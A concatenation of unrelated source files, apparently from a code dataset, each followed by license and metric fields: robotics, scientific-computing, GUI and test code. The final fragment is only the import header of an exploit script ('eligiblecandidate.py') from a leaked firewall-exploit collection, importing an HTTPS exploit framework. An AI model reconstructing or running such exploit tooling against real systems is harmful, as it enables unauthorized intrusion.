if contact:
self.addPredicate('any_finger_contact')
if ((status.gDTA >= 2 and status.gDTB >= 2 and status.gDTC >= 2 and status.gPRA >= 250) # fingers closed or stopped closing
or (status.gDTS >=2 and status.gPRA >= 250) # scissor closing
):
self.addPredicate('gripper_closed')
self.closed = True
else:
self.closed = False
'''
add a single message
'''
def addPredicate(self,predicate):
p = PredicateStatement(predicate=predicate,params=[self.gripper_name,'',''])
self.predicate_msg.predicates.append(p)
'''
publish current predicate messages
'''
def tick(self):
self.pub.publish(self.predicate_msg)
self.vpub.publish(self.valid_predicates)
'''
update and spin
'''
def spin(self,rate=10):
spin_rate = rospy.Rate(rate)
while not rospy.is_shutdown():
self.tick()
spin_rate.sleep()
|
bsd-2-clause
| -316,624,933,566,636,700
| 36.025974
| 136
| 0.639951
| false
| 3.839731
| false
| false
| false
|
wkz/ccp
|
ccp.py
|
1
|
2743
|
#!/usr/bin/env python
import argparse
import base64
import re
import sys
import time
import pexpect
class StdioStream(object):
def pull(self):
return sys.stdin.read()
def push(self, data):
return sys.stdout.write(data)
class LocalStream(object):
def __init__(self, spec):
self.spec = spec
def pull(self):
return open(self.spec).read()
def push(self, data):
open(self.spec, "w").write(data)
class ConsoleStream(object):
PROMPT = re.compile(r"^.*[>#$] $", re.MULTILINE)
def __init__(self, cmd, spec):
self.cmd, self.spec = cmd, spec
self.proc = pexpect.spawn(cmd)
self.proc.sendline()
time.sleep(0.5)
self.proc.expect(ConsoleStream.PROMPT)
def _cmd(self, cmd):
self.proc.sendline(cmd)
self.proc.expect(ConsoleStream.PROMPT)
return self.proc.before[len(cmd):]
def _stty_raw(self):
settings = self._cmd("stty -g").strip()
self.stty = settings.splitlines()[0].strip()
self._cmd("stty raw")
return
def _stty_restore(self):
self._cmd("stty " + self.stty)
return
def pull(self):
data = self._cmd("base64 <%s" % self.spec)
return base64.b64decode(data)
def push(self, data):
b64 = base64.b64encode(data)
self._stty_raw()
self.proc.sendline("dd bs=1 count=%d | base64 -d >%s" %
(len(b64), self.spec))
self._cmd(b64)
self._stty_restore()
def stream(spec):
if spec == "-":
return StdioStream()
commfile = spec.split(":")
if len(commfile) == 1:
return LocalStream(commfile[0])
elif len(commfile) == 2:
return ConsoleStream(commfile[0], commfile[1])
return None
def get_opts():
argp = argparse.ArgumentParser(description="""
Console Copy
If COMM is given, it is assumed to be a valid command for interacting
with a remote UNIX like system. If COMM is not given, FILE may be "-";
in which case ccp will use stdio.
Examples:
Transfer a local file to a remote system connected via conserver:
$ ccp /tmp/data 'console -f ser1':/tmp/data
Grep in a remote file:
$ ccp 'screen /dev/ttyS0 115200':/tmp/data - | grep keyword
""", formatter_class=argparse.RawTextHelpFormatter)
argp.add_argument("src",
help="Source to copy from",metavar="[COMM:]FILE")
argp.add_argument("dst",
help="Destination to copy to", metavar="[COMM:]FILE")
opts = argp.parse_args()
return opts
def main():
opts = get_opts()
data = stream(opts.src).pull()
stream(opts.dst).push(data)
sys.exit(0)
if __name__ == '__main__':
main()
|
mit
| -219,096,259,822,455,140
| 22.646552
| 75
| 0.593146
| false
| 3.424469
| false
| false
| false
|
sio2project/oioioi
|
oioioi/evalmgr/utils.py
|
1
|
1149
|
import logging
import six
from oioioi.base.utils.db import require_transaction
from oioioi.contests.models import Submission
from oioioi.evalmgr.models import QueuedJob
logger = logging.getLogger(__name__)
@require_transaction
def mark_job_state(environ, state, **kwargs):
"""Sets status of given environ in job queue. Additional arguments are
used to update QueuedJob object. Returns True when the status was
set, and the job should be continued, False when it ought to be
ignored.
"""
if 'submission_id' in environ:
submission = Submission.objects.filter(id=environ['submission_id'])
if submission.exists():
kwargs['submission'] = submission.get()
kwargs['state'] = state
qj, created = QueuedJob.objects.get_or_create(
job_id=environ['job_id'], defaults=kwargs
)
if not created:
if qj.state == 'CANCELLED':
qj.delete()
logger.info('Job %s cancelled.', str(environ['job_id']))
return False
else:
for k, v in six.iteritems(kwargs):
setattr(qj, k, v)
qj.save()
return True
|
gpl-3.0
| -7,408,691,713,724,728,000
| 30.916667
| 75
| 0.642298
| false
| 3.868687
| false
| false
| false
|
google-research/google-research
|
eim/models/base.py
|
1
|
9889
|
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base class for models."""
from __future__ import absolute_import
import numpy as np
import tensorflow.compat.v1 as tf
import tensorflow_probability as tfp
tfd = tfp.distributions
def _safe_log(x, eps=1e-8):
return tf.log(tf.clip_by_value(x, eps, 1.0))
def get_squash(squash_eps=1e-6):
return tfp.bijectors.Chain([
tfp.bijectors.AffineScalar(scale=256.),
tfp.bijectors.AffineScalar(
shift=-squash_eps / 2., scale=(1. + squash_eps)),
tfp.bijectors.Sigmoid(),
])
class GSTBernoulli(tfd.Bernoulli):
"""Gumbel-softmax Bernoulli distribution."""
def __init__(self,
temperature,
logits=None,
probs=None,
validate_args=False,
allow_nan_stats=True,
name="GSTBernoulli",
dtype=tf.int32):
"""Construct GSTBernoulli distributions.
Args:
temperature: An 0-D `Tensor`, representing the temperature of a set of
GSTBernoulli distributions. The temperature should be positive.
logits: An N-D `Tensor` representing the log-odds of a positive event.
Each entry in the `Tensor` parametrizes an independent GSTBernoulli
distribution where the probability of an event is sigmoid(logits). Only
one of `logits` or `probs` should be passed in.
probs: An N-D `Tensor` representing the probability of a positive event.
Each entry in the `Tensor` parameterizes an independent Bernoulli
distribution. Only one of `logits` or `probs` should be passed in.
validate_args: Python `bool`, default `False`. When `True` distribution
parameters are checked for validity despite possibly degrading runtime
performance. When `False` invalid inputs may silently render incorrect
outputs.
allow_nan_stats: Python `bool`, default `True`. When `True`, statistics
(e.g., mean, mode, variance) use the value "`NaN`" to indicate the
result is undefined. When `False`, an exception is raised if one or more
of the statistic's batch members are undefined.
name: Python `str` name prefixed to Ops created by this class.
dtype: Type of the Tesnors.
Raises:
ValueError: If both `probs` and `logits` are passed, or if neither.
"""
with tf.name_scope(name, values=[logits, probs, temperature]) as name:
self._temperature = tf.convert_to_tensor(
temperature, name="temperature", dtype=dtype)
if validate_args:
with tf.control_dependencies([tf.assert_positive(temperature)]):
self._temperature = tf.identity(self._temperature)
super(GSTBernoulli, self).__init__(
logits=logits,
probs=probs,
validate_args=validate_args,
allow_nan_stats=allow_nan_stats,
dtype=dtype,
name=name)
@property
def temperature(self):
"""Distribution parameter for the location."""
return self._temperature
def _sample_n(self, n, seed=None):
new_shape = tf.concat([[n], self.batch_shape_tensor()], 0)
u = tf.random_uniform(new_shape, seed=seed, dtype=self.probs.dtype)
logistic = _safe_log(u) - _safe_log(1 - u)
hard_sample = tf.cast(tf.greater(self.logits + logistic, 0), self.dtype)
soft_sample = tf.math.sigmoid((self.logits + logistic) / self.temperature)
sample = soft_sample + tf.stop_gradient(hard_sample - soft_sample)
return tf.cast(sample, self.dtype)
def mlp(inputs,
layer_sizes,
hidden_activation=tf.math.tanh,
final_activation=tf.math.log_sigmoid,
name=None):
"""Creates a simple fully connected multi-layer perceptron."""
with tf.variable_scope(name, reuse=tf.AUTO_REUSE):
inputs = tf.layers.flatten(inputs)
for i, s in enumerate(layer_sizes[:-1]):
inputs = tf.layers.dense(
inputs,
units=s,
activation=hidden_activation,
kernel_initializer=tf.initializers.glorot_uniform,
name="layer_%d" % (i + 1))
output = tf.layers.dense(
inputs,
units=layer_sizes[-1],
activation=final_activation,
kernel_initializer=tf.initializers.glorot_uniform,
name="layer_%d" % len(layer_sizes))
return output
def conditional_normal(inputs,
data_dim,
hidden_sizes,
hidden_activation=tf.math.tanh,
scale_min=1e-5,
truncate=False,
bias_init=None,
scale_init=1.,
nn_scale=True,
name=None):
"""Create a conditional Normal distribution."""
flat_data_dim = np.prod(data_dim)
if nn_scale:
raw_params = mlp(
inputs,
hidden_sizes + [2 * flat_data_dim],
hidden_activation=hidden_activation,
final_activation=None,
name=name)
loc, raw_scale = tf.split(raw_params, 2, axis=-1)
else:
loc = mlp(
inputs,
hidden_sizes + [flat_data_dim],
hidden_activation=hidden_activation,
final_activation=None,
name=name + "_loc")
with tf.variable_scope(name, reuse=tf.AUTO_REUSE):
raw_scale_init = np.log(np.exp(scale_init) - 1 + scale_min)
raw_scale = tf.get_variable(
name="raw_sigma",
shape=[flat_data_dim],
dtype=tf.float32,
initializer=tf.constant_initializer(raw_scale_init),
trainable=True)
scale = tf.math.maximum(scale_min, tf.math.softplus(raw_scale))
# Reshape back to the proper data_dim
loc = tf.reshape(loc, [-1] + data_dim)
scale = tf.reshape(scale, [-1] + data_dim)
# with tf.name_scope(name):
# tf.summary.histogram("scale", scale, family="scales")
# tf.summary.scalar("min_scale", tf.reduce_min(scale), family="scales")
if truncate:
if bias_init is not None:
loc = loc + bias_init
loc = tf.math.sigmoid(loc)
return tfd.Independent(
tfd.TruncatedNormal(loc=loc, scale=scale, low=0., high=1.),
reinterpreted_batch_ndims=len(data_dim))
else:
return tfd.Independent(tfd.Normal(loc=loc, scale=scale),
reinterpreted_batch_ndims=len(data_dim))
def conditional_bernoulli(inputs,
data_dim,
hidden_sizes,
hidden_activation=tf.math.tanh,
bias_init=None,
dtype=tf.int32,
use_gst=False,
temperature=None,
name=None):
"""Create a conditional Bernoulli distribution."""
flat_data_dim = np.prod(data_dim)
bern_logits = mlp(
inputs,
hidden_sizes + [flat_data_dim],
hidden_activation=hidden_activation,
final_activation=None,
name=name)
bern_logits = tf.reshape(bern_logits, [-1] + data_dim)
if bias_init is not None:
bern_logits = bern_logits - tf.log(
1. / tf.clip_by_value(bias_init, 0.0001, 0.9999) - 1)
if use_gst:
assert temperature is not None
base_dist = GSTBernoulli(temperature, logits=bern_logits, dtype=dtype)
else:
base_dist = tfd.Bernoulli(logits=bern_logits, dtype=dtype)
return tfd.Independent(base_dist)
class SquashedDistribution(object):
"""Apply a squashing bijector to a distribution."""
def __init__(self, distribution, data_mean, squash_eps=1e-6):
self.distribution = distribution
self.data_mean = data_mean
self.squash = get_squash(squash_eps)
self.unsquashed_data_mean = self.squash.inverse(self.data_mean)
def log_prob(self, data, num_samples=1):
unsquashed_data = (self.squash.inverse(data) - self.unsquashed_data_mean)
log_prob = self.distribution.log_prob(unsquashed_data,
num_samples=num_samples)
log_prob = (log_prob + self.squash.inverse_log_det_jacobian(
data, event_ndims=tf.rank(data) - 1))
return log_prob
def sample(self, num_samples=1):
samples = self.distribution.sample(num_samples)
samples += self.unsquashed_data_mean
samples = self.squash.forward(samples)
return samples
class ProbabilisticModel(object):
"""Abstract class for probablistic models to inherit."""
def log_prob(self, data, num_samples=1):
"""Reshape data so that it is [batch_size] + data_dim."""
batch_shape = tf.shape(data)[:-len(self.data_dim)]
reshaped_data = tf.reshape(data, [tf.math.reduce_prod(batch_shape)] +
self.data_dim)
log_prob = self._log_prob(reshaped_data, num_samples=num_samples)
log_prob = tf.reshape(log_prob, batch_shape)
return log_prob
def _log_prob(self, data, num_samples=1):
pass
def get_independent_normal(data_dim, variance=1.0):
"""Returns an independent normal with event size the size of data_dim.
Args:
data_dim: List of data dimensions.
variance: A scalar that is used as the diagonal entries of the covariance
matrix.
Returns:
Independent normal distribution.
"""
return tfd.Independent(
tfd.Normal(
loc=tf.zeros(data_dim, dtype=tf.float32),
scale=tf.ones(data_dim, dtype=tf.float32)*tf.math.sqrt(variance)),
reinterpreted_batch_ndims=len(data_dim))
|
apache-2.0
| -6,552,935,640,835,127,000
| 35.899254
| 80
| 0.631914
| false
| 3.67075
| false
| false
| false
|
stscieisenhamer/ginga
|
ginga/qtw/QtHelp.py
|
1
|
9071
|
#
# QtHelp.py -- customized Qt widgets and convenience functions
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import glob
import os
import math
import ginga.toolkit
from ginga.util import iohelper
configured = False
toolkit = ginga.toolkit.toolkit
# if user wants to force a toolkit
if toolkit == 'qt5':
os.environ['QT_API'] = 'pyqt5'
elif toolkit == 'qt4':
os.environ['QT_API'] = 'pyqt'
elif toolkit == 'pyside':
os.environ['QT_API'] = 'pyside'
have_pyqt4 = False
have_pyqt5 = False
have_pyside = False
try:
from qtpy import QtCore
from qtpy import QtWidgets as QtGui
from qtpy.QtGui import QImage, QColor, QFont, QPixmap, QIcon, \
QCursor, QPainter, QPen, QPolygonF, QPolygon, QTextCursor, \
QDrag, QPainterPath, QBrush
from qtpy.QtCore import QItemSelectionModel
from qtpy.QtWidgets import QApplication
try:
from qtpy.QtWebEngineWidgets import QWebEngineView as QWebView
except ImportError as e:
pass
# Let's see what qtpy configured for us...
from qtpy import PYQT4, PYQT5, PYSIDE
have_pyqt4 = PYQT4
have_pyqt5 = PYQT5
have_pyside = PYSIDE
configured = True
except ImportError as e:
pass
if have_pyqt5:
ginga.toolkit.use('qt5')
os.environ['QT_API'] = 'pyqt5'
elif have_pyqt4:
ginga.toolkit.use('qt4')
os.environ['QT_API'] = 'pyqt'
elif have_pyside:
ginga.toolkit.use('pyside')
os.environ['QT_API'] = 'pyside'
else:
raise ImportError("Failed to configure qt4, qt5 or pyside. Is the 'qtpy' package installed?")
tabwidget_style = """
QTabWidget::pane { margin: 0px,0px,0px,0px; padding: 0px; }
QMdiSubWindow { margin: 0px; padding: 2px; }
"""
class TopLevel(QtGui.QWidget):
app = None
## def __init__(self, *args, **kwdargs):
## return super(TopLevel, self).__init__(self, *args, **kwdargs)
def closeEvent(self, event):
if not (self.app is None):
self.app.quit()
def setApp(self, app):
self.app = app
class ComboBox(QtGui.QComboBox):
def insert_alpha(self, text):
index = 0
while True:
itemText = self.itemText(index)
if len(itemText) == 0:
break
if itemText > text:
self.insertItem(index, text)
return
index += 1
self.addItem(text)
def delete_alpha(self, text):
index = self.findText(text)
self.removeItem(index)
def show_text(self, text):
index = self.findText(text)
self.setCurrentIndex(index)
def append_text(self, text):
self.addItem(text)
class VBox(QtGui.QWidget):
def __init__(self, *args, **kwdargs):
super(VBox, self).__init__(*args, **kwdargs)
layout = QtGui.QVBoxLayout()
# because of ridiculous defaults
layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(layout)
def addWidget(self, w, **kwdargs):
self.layout().addWidget(w, **kwdargs)
def setSpacing(self, val):
self.layout().setSpacing(val)
class HBox(QtGui.QWidget):
def __init__(self, *args, **kwdargs):
super(HBox, self).__init__(*args, **kwdargs)
layout = QtGui.QHBoxLayout()
# because of ridiculous defaults
layout.setContentsMargins(0, 0, 0, 0)
self.setLayout(layout)
def addWidget(self, w, **kwdargs):
self.layout().addWidget(w, **kwdargs)
def setSpacing(self, val):
self.layout().setSpacing(val)
class FileSelection(object):
"""Handle Load Image file dialog from File menu."""
def __init__(self, parent_w):
self.parent = parent_w
self.cb = None
def popup(self, title, callfn, initialdir=None, filename=None):
"""Let user select and load file(s). This allows wildcards and
extensions, like in FBrowser.
Parameters
----------
title : str
Title for the file dialog.
callfn : func
Function used to open the file(s).
initialdir : str or `None`
Directory for file dialog.
filename : str
Filter for file dialog.
"""
self.cb = callfn
filenames = QtGui.QFileDialog.getOpenFileNames(
self.parent, title, initialdir, filename)
# Special handling for PyQt5, see
# https://www.reddit.com/r/learnpython/comments/2xhagb/pyqt5_trouble_with_openinggetting_the_name_of_the/
if ginga.toolkit.get_toolkit() == 'qt5':
filenames = filenames[0]
for filename in filenames:
# Special handling for wildcard or extension.
# This is similar to open_files() in FBrowser plugin.
if '*' in filename or '[' in filename:
info = iohelper.get_fileinfo(filename)
ext = iohelper.get_hdu_suffix(info.numhdu)
files = glob.glob(info.filepath) # Expand wildcard
paths = ['{0}{1}'.format(f, ext) for f in files]
# NOTE: Using drag-drop callback here might give QPainter
# warnings.
for path in paths:
self.cb(path)
# Normal load
else:
self.cb(filename)
class DirectorySelection(object):
"""Handle directory selection dialog."""
def __init__(self, parent_w):
self.parent = parent_w
self.cb = None
def popup(self, title, callfn, initialdir=None):
"""Let user select a directory.
Parameters
----------
title : str
Title for the dialog.
callfn : func
Function used to handle selected directory.
initialdir : str or `None`
Directory for dialog.
"""
self.cb = callfn
dirname = QtGui.QFileDialog.getExistingDirectory(
self.parent, title, initialdir)
if dirname:
self.cb(dirname)
class Timer(object):
"""Abstraction of a GUI-toolkit implemented timer."""
def __init__(self, ival_sec, expire_cb, data=None):
"""Create a timer set to expire after `ival_sec` and which will
call the callable `expire_cb` when it expires.
"""
self.ival_sec = ival_sec
self.data = data
self.timer = QtCore.QTimer()
self.timer.setSingleShot(True)
self.timer.timeout.connect(lambda: expire_cb(self))
def start(self, ival_sec=None):
"""Start the timer. If `ival_sec` is not None, it should
specify the time to expiration in seconds.
"""
if ival_sec is None:
ival_sec = self.ival_sec
# QTimer set in milliseconds
ms = int(ival_sec * 1000.0)
self.timer.start(ms)
def set(self, time_sec):
self.start(ival_sec=time_sec)
def cancel(self):
"""Cancel this timer. If the timer is not running, there
is no error.
"""
try:
self.timer.stop()
except:
pass
clear = cancel
def cmap2pixmap(cmap, steps=50):
"""Convert a Ginga colormap into a QPixmap
"""
inds = numpy.linspace(0, 1, steps)
n = len(cmap.clst) - 1
tups = [ cmap.clst[int(x*n)] for x in inds ]
rgbas = [QColor(int(r * 255), int(g * 255),
int(b * 255), 255).rgba() for r, g, b in tups]
im = QImage(steps, 1, QImage.Format_Indexed8)
im.setColorTable(rgbas)
for i in range(steps):
im.setPixel(i, 0, i)
im = im.scaled(128, 32)
pm = QPixmap.fromImage(im)
return pm
def get_scroll_info(event):
"""
Returns the (degrees, direction) of a scroll motion Qt event.
"""
# 15 deg is standard 1-click turn for a wheel mouse
# delta() usually returns 120
if have_pyqt5:
# TODO: use pixelDelta() for better handling on hi-res devices
point = event.angleDelta()
dx, dy = point.x(), point.y()
delta = math.sqrt(dx ** 2 + dy ** 2)
if dy < 0:
delta = -delta
ang_rad = math.atan2(dy, dx)
direction = math.degrees(ang_rad) - 90.0
direction = math.fmod(direction + 360.0, 360.0)
else:
delta = event.delta()
orientation = event.orientation()
direction = None
if orientation == QtCore.Qt.Horizontal:
if delta > 0:
direction = 270.0
elif delta < 0:
direction = 90.0
else:
if delta > 0:
direction = 0.0
elif delta < 0:
direction = 180.0
num_degrees = abs(delta) / 8.0
return (num_degrees, direction)
def get_icon(iconpath, size=None):
image = QImage(iconpath)
if size is not None:
qsize = QtCore.QSize(*size)
image = image.scaled(qsize)
pixmap = QPixmap.fromImage(image)
iconw = QIcon(pixmap)
return iconw
def get_font(font_family, point_size):
font = QFont(font_family, point_size)
return font
#END
|
bsd-3-clause
| 8,053,044,321,151,345,000
| 25.837278
| 113
| 0.584169
| false
| 3.675446
| false
| false
| false
|
meyersbs/misc_nlp_scripts
|
Prosodylab-Aligner-master/eval.py
|
1
|
2762
|
#!/usr/bin/env python3
# eval.py: instrinsic evaluation for forced alignment using Praat TextGrids
# Kyle Gorman <gormanky@ohsu.edu>
from __future__ import division
from aligner import TextGrid
from sys import argv, stderr
from collections import namedtuple
from argparse import ArgumentParser
CLOSE_ENOUGH = 20
TIER_NAME = "phones"
boundary = namedtuple("boundary", ["transition", "time"])
def boundaries(textgrid, tier_name):
"""
Extract a single tier named `tier_name` from the TextGrid object
`textgrid`, and then convert that IntervalTier to a list of boundaries
"""
tiers = textgrid.getList(tier_name)
if not tiers:
exit('TextGrid has no "{}" tier.'.format(tier_name))
if len(tiers) > 1:
exit('TextGrid has many "{}" tiers.'.format(tier_name))
tier = tiers[0]
boundaries = []
for (interval1, interval2) in zip(tier, tier[1:]):
boundaries.append(boundary('"{}"+"{}"'.format(interval1.mark,
interval2.mark),
interval1.maxTime))
return boundaries
def is_close_enough(tx, ty, close_enough):
"""
Return True iff `tx` and `ty` are within `close_enough` of each other
"""
return abs(tx - ty) < close_enough
if __name__ == "__main__":
# check args
tier_name = TIER_NAME
close_enough = CLOSE_ENOUGH / 1000
argparser = ArgumentParser(description="Alignment quality evaluation")
argparser.add_argument("-f", "--fudge", type=int,
help="Fudge factor in milliseconds")
argparser.add_argument("-t", "--tier",
help="Name of tier to use")
argparser.add_argument("OneGrid")
argparser.add_argument("TwoGrid")
args = argparser.parse_args()
if args.fudge:
close_enough = args.fudge / 1000
if args.tier:
tier_name = args.tier
# read in
first = boundaries(TextGrid.fromFile(args.OneGrid), tier_name)
secnd = boundaries(TextGrid.fromFile(args.TwoGrid), tier_name)
# count concordant and discordant boundaries
if len(first) != len(secnd):
exit("Tiers lengths do not match.")
concordant = 0
discordant = 0
for (boundary1, boundary2) in zip(first, secnd):
if boundary1.transition != boundary2.transition:
exit("Tier labels do not match.")
if is_close_enough(boundary1.time, boundary2.time, close_enough):
concordant += 1
else:
discordant += 1
# print out
agreement = concordant / (concordant + discordant)
print("{} 'close enough' boundaries.".format(concordant))
print("{} incorrect boundaries.".format(discordant))
print("Agreement: {:.4f}".format(agreement))
|
mit
| 5,643,734,626,767,116,000
| 32.682927
| 75
| 0.625272
| false
| 3.742547
| false
| false
| false
|
jbarnoud/panedr
|
tests/test_edr.py
|
1
|
8096
|
#-*- coding: utf-8 -*-
"""
Tests for panedr
"""
from __future__ import print_function, division
import six
import os
import sys
import unittest
import pytest
import contextlib
import numpy
import pandas
import panedr
import re
# On python 2, cStringIO is a faster version of StringIO. It may not be
# available on implementations other than Cpython, though. Therefore, we may
# have to fail back on StringIO if cStriongIO is not available.
# On python 3, the StringIO object is not part of the StringIO module anymore.
# It becomes part of the io module.
try:
from cStringIO import StringIO
except ImportError:
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
from collections import namedtuple
try:
from pathlib import Path
except ImportError:
# Python 2 requires the pathlib2 backport of pathlib
from pathlib2 import Path
# Constants for XVG parsing
COMMENT_PATTERN = re.compile(r'\s*[@#%&/]')
LEGEND_PATTERN = re.compile(r'@\s+s\d+\s+legend\s+"(.*)"')
NDEC_PATTERN = re.compile(r'[\.eE]')
# Data constants
DATA_DIR = os.path.join(os.path.dirname(__file__), 'data')
EDR = os.path.join(DATA_DIR, 'cat.edr')
EDR_XVG = os.path.join(DATA_DIR, 'cat.xvg') # All EDR fields read with
# ``gmx energy``
EDR_IRREGULAR = os.path.join(DATA_DIR, 'irregular.edr')
EDR_IRREGULAR_XVG = os.path.join(DATA_DIR, 'irregular.xvg')
EDR_DOUBLE = os.path.join(DATA_DIR, 'double.edr')
EDR_DOUBLE_XVG = os.path.join(DATA_DIR, 'double.xvg')
EDR_BLOCKS = os.path.join(DATA_DIR, 'blocks.edr')
EDR_BLOCKS_XVG = os.path.join(DATA_DIR, 'blocks.xvg')
EDR_Data = namedtuple('EDR_Data', ['df', 'xvgdata', 'xvgtime', 'xvgnames',
'xvgprec', 'edrfile', 'xvgfile'])
@pytest.fixture(scope='module',
params=[(EDR, EDR_XVG),
(EDR_IRREGULAR, EDR_IRREGULAR_XVG),
(EDR_DOUBLE, EDR_DOUBLE_XVG),
(EDR_BLOCKS, EDR_BLOCKS_XVG),
(Path(EDR), EDR_XVG),
])
def edr(request):
edrfile, xvgfile = request.param
df = panedr.edr_to_df(edrfile)
xvgdata, xvgnames, xvgprec = read_xvg(xvgfile)
xvgtime = xvgdata[:, 0]
xvgdata = xvgdata[:, 1:]
return EDR_Data(df, xvgdata, xvgtime, xvgnames, xvgprec, edrfile, xvgfile)
class TestEdrToDf(object):
"""
Tests for :fun:`panedr.edr_to_df`.
"""
def test_output_type(self, edr):
"""
Test that the function returns a pandas DataFrame.
"""
assert isinstance(edr.df, pandas.DataFrame)
def test_columns(self, edr):
"""
Test that the column names and order match.
"""
ref_columns = numpy.insert(edr.xvgnames, 0, u'Time')
columns = edr.df.columns.values
if columns.shape[0] == ref_columns.shape[0]:
print('These columns differ from the reference (displayed as read):')
print(columns[ref_columns != columns])
print('The corresponding names displayed as reference:')
print(ref_columns[ref_columns != columns])
assert ref_columns.shape == columns.shape, \
'The number of columns read is unexpected.'
assert numpy.all(ref_columns == columns), \
'At least one column name was misread.'
def test_times(self, edr):
"""
Test that the time is read correctly when dt is regular.
"""
time = edr.df[u'Time'].values
assert numpy.allclose(edr.xvgtime, time, atol=5e-7)
def test_content(self, edr):
"""
Test that the content of the DataFrame is the expected one.
"""
content = edr.df.iloc[:, 1:].values
print(edr.xvgdata - content)
assert numpy.allclose(edr.xvgdata, content, atol=edr.xvgprec/2)
def test_verbosity(self):
"""
Make sure the verbose mode does not alter the results.
"""
with redirect_stderr(sys.stdout):
df = panedr.edr_to_df(EDR, verbose=True)
ref_content, _, prec = read_xvg(EDR_XVG)
content = df.values
print(ref_content - content)
assert numpy.allclose(ref_content, content, atol=prec/2)
def test_progress(self):
"""
Test the progress meter displays what is expected.
"""
output = StringIO()
with redirect_stderr(output):
df = panedr.edr_to_df(EDR, verbose=True)
progress = output.getvalue().split('\n')[0].split('\r')
print(progress)
dt = 2000.0
# We can already iterate on `progress`, but I want to keep the cursor
# position from one for loop to the other.
progress_iter = iter(progress)
assert '' == next(progress_iter)
self._assert_progress_range(progress_iter, dt, 0, 21, 1)
self._assert_progress_range(progress_iter, dt, 30, 201, 10)
self._assert_progress_range(progress_iter, dt, 300, 2001, 100)
self._assert_progress_range(progress_iter, dt, 3000, 14101, 1000)
# Check the last line
print(df.iloc[-1, 0])
ref_line = 'Last Frame read : 14099, time : 28198000.0 ps'
last_line = next(progress_iter)
assert ref_line == last_line
# Did we leave stderr clean with a nice new line at the end?
assert output.getvalue().endswith('\n'), \
'New line missing at the end of output.'
def _assert_progress_range(self, progress, dt, start, stop, step):
for frame_idx in range(start, stop, step):
ref_line = 'Read frame : {}, time : {} ps'.format(frame_idx,
dt * frame_idx)
progress_line = next(progress)
print(frame_idx, progress_line)
assert ref_line == progress_line
def read_xvg(path):
"""
Reads XVG file, returning the data, names, and precision.
The data is returned as a 2D numpy array. Column names are returned as an
array of string objects. Precision is an integer corresponding to the least
number of decimal places found, excluding the first (time) column.
The XVG file type is assumed to be 'xy' or 'nxy'. The function also assumes
that there is only one serie in the file (no data after // is // is
present). If more than one serie are present, they will be concatenated if
the number of column is consistent, is the number of column is not
consistent among the series, then the function will crash.
"""
data = []
names = []
prec = -1
with open(path) as infile:
for line in infile:
if not re.match(COMMENT_PATTERN, line):
data.append(line.split())
precs = [ndec(val) for val in data[-1][1:]]
if prec == -1:
prec = min(precs)
else:
prec = min(prec, *precs)
continue
match = re.match(LEGEND_PATTERN, line)
if match:
names.append(six.text_type(match.groups()[0]))
if prec <= 0:
prec = 1.
else:
prec = 10**(-prec)
return (numpy.array(data, dtype=float),
numpy.array(names, dtype=object),
prec)
def ndec(val):
"""Returns the number of decimal places of a string rep of a float
"""
try:
return len(re.split(NDEC_PATTERN, val)[1])
except IndexError:
return 0
@contextlib.contextmanager
def redirect_stderr(target):
"""
Redirect sys.stderr to an other object.
This function is aimed to be used as a contaxt manager. It is useful
especially to redirect stderr to stdout as stdout get captured by nose
while stderr is not. stderr can also get redirected to any other object
that may act on it, such as a StringIO to inspect its content.
"""
stderr = sys.stderr
try:
sys.stderr = target
yield
finally:
sys.stderr = stderr
if __name__ == '__main__':
unittest.main()
|
lgpl-2.1
| 5,920,553,386,538,837,000
| 33.451064
| 81
| 0.600173
| false
| 3.693431
| true
| false
| false
|
whereaswhile/DLSR
|
common/SimPrvd.py
|
1
|
2133
|
#simulated regression data provider
import os
import sys
import numpy as np
import scipy.misc
import glob
sys.path.append("../convnet-folk_master")
from w_util import readLines
# define default parameters
IN_DATA_SIZE=[5, 5, 1]
OUT_DATA_SIZE=[16, 1]
DATA_NUM=1
class SimSet:
def __init__(self, paramfile):
print "SimPrvd: parsing", paramfile
plines = readLines(paramfile)
self.param = {'paramfile': paramfile, 'filtype': 'avg'}
for l in plines:
l=l.rstrip().split()
self.param[l[0]]=l[1]
print self.param
self.indim=1
for s in IN_DATA_SIZE:
self.indim*=s
self.outdim=1
for s in OUT_DATA_SIZE:
self.outdim*=s
# draw data
self.input=[]
self.output=[]
if self.param['filtype'][-4:]=='.fil': #load filter from file
fil=np.loadtxt(self.param['filtype'])
fil=np.reshape(fil, IN_DATA_SIZE)
for i in range(DATA_NUM):
if DATA_NUM==1:
m=np.ones(IN_DATA_SIZE)
else:
m=np.random.random(IN_DATA_SIZE) #random
self.input+=[m]
mm=np.zeros(OUT_DATA_SIZE)
if self.param['filtype']=='avg':
mm[0, 0]=np.mean(m)
else:
mm[0, 0]=np.sum(m*fil)
self.output+=[mm]
def get_num_images(self):
return DATA_NUM
#def get_num_classes(self):
# return 0
def get_input_dim(self):
return self.indim
def get_output_dim(self):
return self.outdim
def get_input(self, idx):
return self.input[idx]
def get_output(self, idx):
return self.output[idx]
def getmeta(self, idx):
return self.param
def getStore(param):
return SimSet(param)
def test(param):
ts = SimSet(param)
print "{} images, {} classes".format(ts.get_num_images(), ts.get_num_classes())
for i in range(0,20,10):
im=ts.get_input(i)
y=ts.get_output(i)
meta=ts.getmeta(i)
print "i={}, input={},\toutput={}".format(i, im, y)
print 'image shape:', np.shape(im)
print 'meta', meta
if __name__ == '__main__':
print 'testing SimPrvd.py!'
assert(len(sys.argv)==2)
test(sys.argv[1])
|
gpl-2.0
| 8,928,693,029,719,009,000
| 21.452632
| 83
| 0.592124
| false
| 2.938017
| false
| false
| false
|
DarthMaulware/EquationGroupLeaks
|
Leak #1 - Equation Group Cyber Weapons Auction - Invitation/EQGRP-Free-File/Firewall/EXPLOITS/ELCA/eligiblecandidate.py
|
1
|
5274
|
#!/usr/bin/env python2.7
import sys
import tarfile
from time import ctime,sleep
from StringIO import StringIO
from fosho import HTTPSExploit,run_exploit,randstr
